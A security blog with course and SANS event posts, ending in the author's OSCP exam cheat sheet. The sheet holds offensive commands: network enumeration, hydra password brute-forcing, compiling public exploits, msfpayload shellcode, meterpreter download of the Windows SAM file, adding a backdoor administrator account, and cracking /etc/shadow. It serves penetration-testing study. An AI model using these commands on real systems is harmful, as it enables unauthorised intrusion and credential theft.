security.crudtastic.com

Security Nerd Stuff


I’ll be honest .. after doing the Offensive-Security Pentesting with Backtrack course, sitting the SANS SEC-560 course lost a bit of its lustre for me. Nothing against the course .. it was awesome .. and I love all the SANS stuff!! The OffSec course though was pretty tough and I had only just completed it a few months before the SANS training, and to be honest, the OffSec course went a lot deeper.

I originally thought I’d give myself a break from doing SANS stuff for a while .. then I woke up yesterday .. and with 30 days left to sit the GPEN exam I booked it! Funnily enough, straight after that I looked at signing up for 2 other SANS courses ahahhahaah.

So now I have the task of getting ready to sit an exam in 15 days after not looking at the books in over 2 months (I'm so bad). This is very reminiscent of my GSEC study (do a search for my post) .. and I managed to nail that ok.

Anyway .. i’m whining about my GPEN when Chris is about to head off and tackle his GSE .. Good luck nerdlinger!!

Yet another awesome email that I received this morning (what a great day it’s been for email – haha)

The guys at Offensive Security have put together a short presentation on a real-world penetration test. The video is super edited to show you just the important bits, but you get the picture of what they’re showing you.

You can see the full blog posting at http://www.offensive-security.com/videos/penetration-testing-in-the-real-world/

I personally have to say that the Offensive Security – Pentesting with Backtrack course was THE best course I have done to date! It was so intense and had an awesome lab to refine your skills in. I have gone from strength to strength since doing this course. I am in the process of rebuilding my testing lab at home so that I can continue to push my newly learnt skills and build upon what these guys have taught me. If there is any thought in your head about this particular course, all I can say is, DO IT! You will not regret it!

SANS Brisbane has just kicked off !!

More pics to come during the week

Following a very successful program in 2009, we are returning to Australia’s Capital City for SANS Canberra 2010 on 12-17 July to deliver SANS’ world-class information security training.

Register by 3 June to receive the best savings on the following courses:

For complete course descriptions see our Event-at-Glance page.

Put the skills you’ll learn to practical use and more than GIAC certified professionals who make the info sec industry safe! Visit the GIAC Roadmap page for more information and register for your certification attempt today!

SANS training is well-known for being relevant and pragmatic. Our Canberra 2010 instructors are industry leaders and experts who understand the challenges you face on a daily basis. Their real-world experience increases the practical value of the course material.

Classes will be held at the National Convention Centre in Canberra. Canberra is one of Australia’s few planned cities, a place where architectural style complements the beauty of the surrounding Australian bush. Located on the ancient lands of the traditional owners, the Ngunnawal people, Canberra is thought to derive its name from the Aboriginal word Kamberra or ‘meeting place.’ Canberra is known for its hospitality, with its trendy cafes, restaurants, nightclubs, museums and galleries, and boutique shopping. Explore the city’s trails and weekend markets for fresh regional produce and local wines.

To follow or tweet about this event, use hashtag #sanscanberra. Follow SANS at @SANSInstitute.

Get the training you need to advance your career. Start making your training and travel plans now to join us for SANS Canberra 2010!

http://www.sans.org/brisbane-2010/night.php

SANS @Night

Look Out! Open Source Extrusion Detection

- Eric Conrad
- Tuesday 25 May * 7:00pm – 8:00pm

Your firewall has been turned inside-out. With the advent of client-side attacks, infected USB drives, and infected mobile devices, perimeter network defenses have failed. The bad guys are already in. How do you stop them? By looking out. This talk will discuss techniques for detecting the outbound flow of sensitive information: extrusion detection. Eric Conrad will discuss the successful attacks and failed perimeter defenses that led to the creation of Xfiltr8, the open source Extrusion Detection live CD.

Read Eric’s bio here: http://www.sans.org/brisbane-2010/faculty.php

Location

The Marque
103 George Street
Brisbane, Queensland

To register:

Send RSVP to rkantor@shearwater.com.au

In the email please state:

Full Name

Company

SANS Brisbane 2010


SANS is bringing world-class training to Queensland for SANS Brisbane 2010 on 24-29 May! (http://www.sans.org/info/54773) Why not choose the beauty of the city along the Brisbane River as the backdrop for your training? Register by 14 April to receive the best savings on the following courses:

- Security 401: SANS Security Essentials Bootcamp Style (GSEC) taught by Mark Hofman, SANS Certified Instructor

- Security 560: Network Penetration Testing and Ethical Hacking (GPEN) taught by Eric Conrad, SANS Certified Instructor

Below is a brief snapshot of what each course covers. For complete course descriptions see: http://www.sans.org/info/54774

- SEC 401: Security 401: SANS Security Essentials Bootcamp Style (GSEC).
In this course you will learn the language and underlying theory of computer security. At the same time you will learn the essential, up-to-the-minute knowledge and skills required for effective performance if you are given the responsibility for securing systems and/or organizations. This course meets both of the key promises SANS makes to our students: (1) You will gain up-to-the-minute knowledge you can put into practice immediately upon returning to work; and, (2) You will be taught by the best security instructors in the industry.

Maximize your training time and turbo-charge your career in information security by learning the full SANS Security Essentials curriculum needed to qualify for the GSEC certification.

- SEC 560: Network Penetration Testing and Ethical Hacking (GPEN) covers the ingredients for successful network penetration testing to help attendees improve their enterprise’s security stance.

FIND SECURITY FLAWS BEFORE THE BAD GUYS DO! We address detailed pre-test planning, including setting up an effective penetration testing infrastructure and establishing ground rules with the target organization to avoid surprises and misunderstanding. Then, we discuss a time-tested methodology for penetration and ethical hacking across the network, evaluating the security of network services and the operating systems behind them.

Both courses are associated with a GIAC Certification (GSEC and GPEN). Put the skills you’ll learn to practical use and more than GIAC certified professionals who make the info sec industry safe!  Visit http://www.giac.org/info/54779 for more information and register for your certification attempt today!

SANS training is well-known for being relevant and pragmatic. All SANS instructors are industry leaders and experts who understand the challenges you face on a daily basis.  Their real-world experience increases the practical value of the course material.  Here are some comments from recent alumni:

“The SANS class (SEC401) stands out above the rest because of the subject matter experts who teach the classes and labs.” – Shirlee Eitel-Birgham, State of Nevada

“Anyone who is in the network penetration testing field should take this course (SEC560) to improve your current skills and learn new ones.” - Nick Ramser, Ohio State University

“This is the way you need to learn: roll up your sleeves, dig in to the fundamentals and the nitty-gritty technical details, and then go ’hands-on’ to practice and reinforce what you’ve been taught.” – Joseph Price, DoD

Classes will be held at the Marque Brisbane Hotel, which is located in the heart of the city and just a minute’s walk to the Brisbane River. The central location is the ideal base from which to explore some of Brisbane’s best attractions. Cruise the river, shop along Queen Street, enjoy the Treasury Casino or the South Bank Parklands. A special discount rate of AUS $179 S/D will be honored based on space availability. This discount is only available through 22 April, so take advantage of this special offer and make your reservations today! For more information see http://www.sans.org/info/54784

To follow or tweet about this event, use hashtag #sansbrisbane. Follow SANS at http://twitter.com/SANSInstitute

Get the training you need to advance your career.  Start making your training and travel plans now to join us for SANS Brisbane 2010! (http://www.sans.org/info/54773)

By no means is this information useful to many people at all! This is the insane ramblings going through my head that I want to keep handy for when I get a rush of blood and start going totally off course. There are probably a few mistakes in some of the stuff here (it was written in haste) – but I’m sure if you’re interested, or know about what is written here, then you’ll know the correct syntax for the commands (or be able to work it out).


If you do find some of this information of any use to you … AWESOME!! Otherwise, move along, there’s nothing to see here.


These notes are just brain jerkers for my OFFSEC101 / OSCP exam that I will be taking on Monday the 21st December. It’s a 24hr lab challenge where you are meant to hack 5 separate machines and gain root/admin/system access. All in all I feel ok about it .. I’m more worried about the unknown factor in these types of exams (it’s not a learn and repeat type thing) where you’re thinking outside of your normal boundaries; there’s also the fact that it goes for 24hrs and fatigue can make people do silly things!


I’ll let you all know how I go after the event! Now, back to the notes …




Notes

Use Leo and make a new child entry for each IP. Keep ALL information related to testing of that machine in that child entry. Create child entries within the IP entry for each type of scan/information gathering. Create a totally separate child entry for username/password combinations, general notes etc. Leo/good record keeping is what will win the game.



Scan network for live hosts

(nmap/zenmap)

For NMAP –


nmap -vv -sP 192.168.0.1-254 -oG hosts_up.txt

cat hosts_up.txt | grep -i "up"




nmap -PN 192.168.9.200-254

(this will also show open ports for each host)




Identify OS

(nmap/zenmap)

For NMAP –


nmap -O 192.168.0.100 (just OS fingerprint)


nmap -A 192.168.9.201 (runs an “aggressive” scan – port scan, OS fingerprint, version scan, scripts and traceroute)




Check hosts for services

(nmap/zenmap)

For NMAP

- nmap -sS 192.168.9.254 (TCP)

- nmap -sU 192.168.9.254 (UDP)

(Could be better to do this in zenmap and group servers by services)


FOR SNMP

- snmpwalk -c public -v1 192.168.9.254 1 | grep hrSWRunName | cut -d" " -f4


For a known port

- nmap -p 139 192.168.9.254



DNS Lookups/Hostnames


host -l <domain> <dns server>

e.g. host -l acme.local 192.168.0.220




Banner grab/Version services

(nmap/zenmap/SNMP)

Check versions of software/services against milw0rm and SecurityFocus


For NMAP

- nmap -sV 192.168.9.254



For SNMP

snmpenum -t 192.168.0.100 (displays all SNMP information for that server)



For SMTP

nc -v <mailserver> 25

- Will give mailserver version. Can also VRFY to find valid usernames/email accounts



Netbios/SMB

- smb4k (graphical interface – lists shares)


- smbserverscan


- metasploit auxiliary scanner

./msfconsole

show

use scanner/smb/version

set RHOSTS 192.168.0.1-192.168.0.254

run




Enumerate Usernames

(SNMP/SMTP/SMB[NETBIOS]/Add others here)


For SMB

- nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep open sessions)

(on my machine /root/offsec) ./samrdump.py 192.168.9.201 (results from above)


For SNMP

- nmap -sT -p 161 192.168.9.200-254 -oG snmp_results.txt (then grep)

- snmpwalk -c public -v1 192.168.9.201 1 | grep 77.1.2.25 | cut -d" " -f4
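The notes lean on grepping nmap's grepable (-oG) output three times: hosts reported as up in the host sweep at the top, and hosts with 445 or 161 open just above. As an added example that is not part of the original notes, this Python script parses the -oG format properly so that the same triage does not depend on eyeballing grep, and distinguishes an "open" port from "open|filtered" or "filtered" (which a plain `grep open` would lump together). The scan output embedded below is constructed for the example; the function names are my own.

```python
import ipaddress
import re

# Constructed sample of nmap's grepable (-oG) output; not output from a real scan.
SAMPLE_GNMAP = """\
# Nmap 5.21 scan initiated Mon Dec 21 09:00:00 2009 as: nmap -sT -p 445,161 -oG smb_results.txt 192.168.9.200-254
Host: 192.168.9.200 ()\tStatus: Up
Host: 192.168.9.200 ()\tPorts: 445/open/tcp//microsoft-ds///, 161/closed/udp//snmp///\tIgnored State: closed (0)
Host: 192.168.9.201 (fileserver.acme.local)\tStatus: Up
Host: 192.168.9.201 (fileserver.acme.local)\tPorts: 445/open/tcp//microsoft-ds///, 161/open|filtered/udp//snmp///
Host: 192.168.9.202 ()\tStatus: Down
Host: 192.168.9.203 ()\tStatus: Up
Host: 192.168.9.203 ()\tPorts: 445/filtered/tcp//microsoft-ds///, 161/open/udp//snmp///
# Nmap done at Mon Dec 21 09:00:05 2009 -- 55 IP addresses (3 hosts up) scanned in 5.10 seconds
"""

# Every data line starts "Host: <ip> (<hostname>)"; the remaining fields are tab-separated "Key: value".
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")


def parse_gnmap(text):
    """Return {ip: {"hostname": str, "up": bool, "ports": [(port, state, proto, service), ...]}}."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # "# Nmap ..." comment lines and blanks
        ip, hostname = m.group(1), m.group(2)
        entry = hosts.setdefault(ip, {"hostname": hostname, "up": False, "ports": []})
        for field in line.split("\t")[1:]:
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["up"] = value.strip().lower() == "up"
            elif key == "Ports":
                # Each port spec is port/state/protocol/owner/service/rpc info/version/
                for spec in value.split(", "):
                    parts = spec.split("/")
                    entry["ports"].append((int(parts[0]), parts[1], parts[2], parts[4]))
                entry["up"] = True  # nmap only reports ports for hosts it found up
            # "Ignored State" and other fields carry nothing we need here
    return hosts


def _sorted_ips(ips):
    return sorted(ips, key=ipaddress.ip_address)


def live_hosts(hosts):
    """Replacement for: cat hosts_up.txt | grep -i "up"."""
    return _sorted_ips(ip for ip, h in hosts.items() if h["up"])


def hosts_with_open_port(hosts, port, proto="tcp"):
    """Replacement for grepping smb_results.txt / snmp_results.txt for open ports.

    Only the exact state "open" counts; "open|filtered" (typical for UDP) and "filtered" do not.
    """
    return _sorted_ips(
        ip for ip, h in hosts.items()
        if any(p == port and pr == proto and st == "open" for p, st, pr, _ in h["ports"])
    )


if __name__ == "__main__":
    hosts = parse_gnmap(SAMPLE_GNMAP)
    print("up:", live_hosts(hosts))
    print("445/tcp open:", hosts_with_open_port(hosts, 445))
    print("161/udp open:", hosts_with_open_port(hosts, 161, "udp"))
```

Pointing `parse_gnmap` at the contents of a real `-oG` file instead of `SAMPLE_GNMAP` is the only change needed to use it on actual results; keeping one dictionary per IP also fits the one-child-entry-per-IP record keeping the notes recommend.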


For SMTP – (/pentest/enumeration/vrfy)

- ./smtp_VRFY.py <mailserver IP>

** NEED TO MAKE THREADED – VERY SLOW **


SAMRDUMP.PY – (/pentest/python/impacket-examples/samrdump.py)

- ./samrdump.py <SMB server>


*** NAMES.TXT – /pentest/enumeration/vrfy/names.txt ***

*** OR /pentest/web/wfuzz/wordlists/others/names.txt ***





Crack Passwords

(hydra/THC bruter)

(need mil-dict.txt from Milw0rm – cracked hashes)


FTP – hydra -l <username> -P mil-dict.txt -f <FTP SERVER> ftp -V


POP3 – hydra -l <username> -P mil-dict.txt -f <MAIL SERVER> pop3 -V (may need to use -t 15 to limit concurrent connections)


SNMP – hydra -P mil-dict.txt -f <SNMP SERVER> snmp -V


MS VPN – dos2unix words (whatever word list)

cat words | thc-pptp-bruter <VPN server>



Look for known vulnerable services

(refer nmap/zenmap output)

Check versions of software (by either snmp enumeration or nmap/zenmap) against http://www.milw0rm.com/search.php or http://www.securityfocus.com/vulnerabilities or http://www.exploit-db.com




Compile exploit code if possible

(milw0rm archive)


cd /pentest/exploits/milw0rm

cat sploitlist.txt | grep -i [exploit]


Some exploits may be written for compilation under Windows, while others for Linux.

You can identify the environment by inspecting the headers.

cat exploit | grep "#include"


Windows:  process.h, string.h, winbase.h, windows.h, winsock2.h

Linux:   arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h


Grep out Windows headers, to leave only Linux based exploits:

cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u
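The grep pipeline above keys on the string "sys" anywhere in a file, so it also matches comments, system() calls and Windows sources that happen to contain the word. As an added example that is not part of the original notes, this Python script classifies C sources by the header sets listed above instead, reading only the #include lines. The sample sources are constructed (a few include lines and an empty main each); the header sets are the notes' own, except that string.h is left out because it is standard C on both platforms and says nothing about the target.

```python
import re

# Header sets from the notes above. string.h is deliberately excluded: it exists on
# both platforms, so it cannot distinguish a Windows build from a Linux one.
WINDOWS_HEADERS = {"process.h", "winbase.h", "windows.h", "winsock2.h"}
LINUX_HEADERS = {"arpa/inet.h", "fcntl.h", "netdb.h", "netinet/in.h",
                 "sys/socket.h", "sys/types.h", "unistd.h"}

# Matches "#include <x.h>" and '#include "x.h"', tolerating whitespace after '#'.
INCLUDE_RE = re.compile(r'^\s*#\s*include\s*[<"]([^>"]+)[>"]', re.MULTILINE)

# Constructed sample sources keyed by file name; they are not files from any archive.
SAMPLE_SOURCES = {
    "66.c": "#include <stdio.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n"
            "int main(void) { return 0; }\n",
    "ability.c": "#include <winsock2.h>\n#include <windows.h>\n#include <string.h>\n"
                 "int main(void) { return 0; }\n",
    "portable.c": "#ifdef _WIN32\n#include <winsock2.h>\n#else\n#include <sys/socket.h>\n"
                  "#include <unistd.h>\n#endif\nint main(void) { return 0; }\n",
    "hello.c": "#include <stdio.h>\n#include <string.h>\nint main(void) { return 0; }\n",
}


def includes(source):
    """Set of header names pulled from the #include lines of one C source."""
    return set(INCLUDE_RE.findall(source))


def classify(source):
    """Return "windows", "linux", "both" or "unknown" based on which header sets are hit."""
    inc = includes(source)
    win = bool(inc & WINDOWS_HEADERS)
    nix = bool(inc & LINUX_HEADERS)
    if win and nix:
        return "both"   # e.g. #ifdef _WIN32 blocks; needs a closer look before building
    if win:
        return "windows"
    if nix:
        return "linux"
    return "unknown"    # only portable headers such as stdio.h / string.h


def linux_only(sources):
    """File names that look Linux-only, the intent of the grep pipeline in the notes."""
    return sorted(name for name, src in sources.items() if classify(src) == "linux")


def by_platform(sources):
    """Group file names by classification so each group can be handled in one pass."""
    groups = {}
    for name, src in sources.items():
        groups.setdefault(classify(src), []).append(name)
    return {k: sorted(v) for k, v in groups.items()}


if __name__ == "__main__":
    for platform, names in by_platform(SAMPLE_SOURCES).items():
        print(f"{platform:8s} {', '.join(names)}")
```

To run it over a directory, replace `SAMPLE_SOURCES` with a dictionary built from `open(path).read()` for each `*.c` file; the "both" bucket is worth checking by hand because such files usually compile on either platform depending on preprocessor defines.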


LINUX

gcc -o dcom 66.c

./dcom



WINDOWS
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe ability.c -lwsock32
wine ability.exe (to run compiled file)




Wireshark Filters


To filter out all traffic for IP 192.168.0.100

!(ip.addr == 192.168.0.100)




FUZZING STEPS – ASH STYLE

  1. Determine target application and operating system
  2. Obtain a copy of the application
  3. Analyse the RFC & communication protocols
  4. Discover & record crash conditions
  5. Analyse crash conditions for exploitation opportunities
Things we need to know
  • Which 4 bytes overwrite EIP
  • Do we have enough space in buffer for shellcode
  • Is this shellcode easily accessible in memory
  • Does the application filter out any characters
  • Will we encounter overflow protection mechanisms

(*** HANDY – framework3/tools -> nasm_shell.rb => JMP ESP ***)

Creating pattern for EIP location
- framework3/tools -> pattern_create.rb <length> >> Fuzzing_script (will append to the end of the script)
- then look in ollydbg for pattern (need to reverse it and convert)

- pattern_offset.rb <EIP PATTERN>
- will show byte offset

Creating shellcode
(in framework3)
./msfpayload -l | grep -i shell

./msfpayload …… o (for options)
./msfpayload …… c (to create)
** TAKE NOTE OF SHELLCODE SIZE AND ADJUST FINAL BUFFER TO SUIT **

CAN ALSO USE FRAMEWORK2 MSFWEB INTERFACE (super easy)


Finding an exploit
/pentest/exploits/milw0rm
grep <exploit> sploitlist.txt


MSFCLI (p243)
./msfcli
-o options
-p payloads
-t test
-e exploit

MSFCONSOLE
sessions -l => list created sessions
sessions -i # => interact with specific session number

show options

search <string>

use exploit/ …..
set PAYLOAD ….

exploit


Meterpreter Payloads (p260)
payload = windows/meterpreter/reverse_tcp ….

meterpreter> help (lists all commands)

upload <file> c:\\windows

download c:\\windows\\repair\\sam /tmp

ps (running tasks)

execute -f cmd -c (creates a new channel with the cmd shell)
interact # (interacts with channel)


Other useful windows commands
net user ash my_password /add
net localgroup administrators ash /add


Passwords & Hashes
Windows SAM => %systemroot%\Repair
(pwdump or fgdump – p340)

or use framework meterpreter shell => gethashes

Linux => /etc/passwd & /etc/shadow


John The Ripper
for linux => unshadow passwd & shadow file to another file

./john hashes.txt



Associated Documents

TCPDUMP - http://packetlife.net/media/library/12/tcpdump.pdf
SANS NETCAT - http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
SANS MISC TOOLS - http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
SANS 504 – Can’t find